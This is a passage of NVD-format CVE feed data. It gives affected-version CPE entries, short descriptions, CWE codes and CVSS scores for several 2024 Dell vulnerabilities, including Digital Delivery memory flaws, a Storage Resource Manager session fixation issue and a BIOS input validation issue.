"operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t130_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t130:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r230_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r230:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3240_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3240:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3230_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3230:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx3330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx3330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:nx440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:nx440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc_core_xc7625_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.7.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc_core_xc7625:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_6420_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_6420_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc640_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc640_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc940_system_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc940_system:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xcxr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xcxr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc6320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc6320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc730xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc730xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 3.3, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-13T17:15Z", "lastModifiedDate" : "2025-01-31T15:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0155", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033", "name" : "https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033", "name" : "https://www.dell.com/support/kbdoc/en-us/000222292/dsa-2024-033", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell Digital Delivery, versions prior to 5.2.0.0, contain a Use After Free Vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to application crash or execution of arbitrary code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:digital_delivery:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.2.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-04T13:15Z", "lastModifiedDate" : "2025-01-08T16:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0156", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-120" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222536/dsa-2024-032-security-update-for-dell-digital-delivery-for-a-buffer-overflow-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell Digital Delivery, versions prior to 5.2.0.0, contain a Buffer Overflow Vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to arbitrary code execution and/or privilege escalation." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:digital_delivery:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.2.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-04T13:15Z", "lastModifiedDate" : "2025-01-08T16:13Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0157", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-384" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-nz/000224070/dsa-2024-143-dell-storage-resource-manager-srm-and-dell-storage-monitoring-and-reporting-smr-security-update-for-multiple-third-party-component-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-nz/000224070/dsa-2024-143-dell-storage-resource-manager-srm-and-dell-storage-monitoring-and-reporting-smr-security-update-for-multiple-third-party-component-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-nz/000224070/dsa-2024-143-dell-storage-resource-manager-srm-and-dell-storage-monitoring-and-reporting-smr-security-update-for-multiple-third-party-component-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-nz/000224070/dsa-2024-143-dell-storage-resource-manager-srm-and-dell-storage-monitoring-and-reporting-smr-security-update-for-multiple-third-party-component-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell Storage Resource Manager, 4.9.0.0 and below, contain(s) a Session Fixation Vulnerability in SRM Windows Host Agent. An adjacent network unauthenticated attacker could potentially exploit this vulnerability, leading to the hijack of a targeted user's application session." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:storage_monitoring_and_reporting:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.0.0.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:storage_resource_manager:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.0.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-04-12T17:17Z", "lastModifiedDate" : "2025-02-04T17:08Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0158", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-20" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-in/000220141/dsa-2024-030-security-update-for-dell-client-bios-for-an-improper-input-validation-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-in/000220141/dsa-2024-030-security-update-for-dell-client-bios-for-an-improper-input-validation-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-in/000220141/dsa-2024-030-security-update-for-dell-client-bios-for-an-improper-input-validation-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-in/000220141/dsa-2024-030-security-update-for-dell-client-bios-for-an-improper-input-validation-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with admin privileges may potentially exploit this vulnerability to modify a UEFI variable, leading to denial of service and escalation of privileges" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_m15_r6_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_m15_r6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_m15_r7_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_m15_r7:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_m16_r1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.15.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_m16_r1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_m18_r1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.15.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_m18_r1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_m18_r2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.2.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_m18_r2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:alienware_x14_r2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.12.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:alienware_x14_r2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : 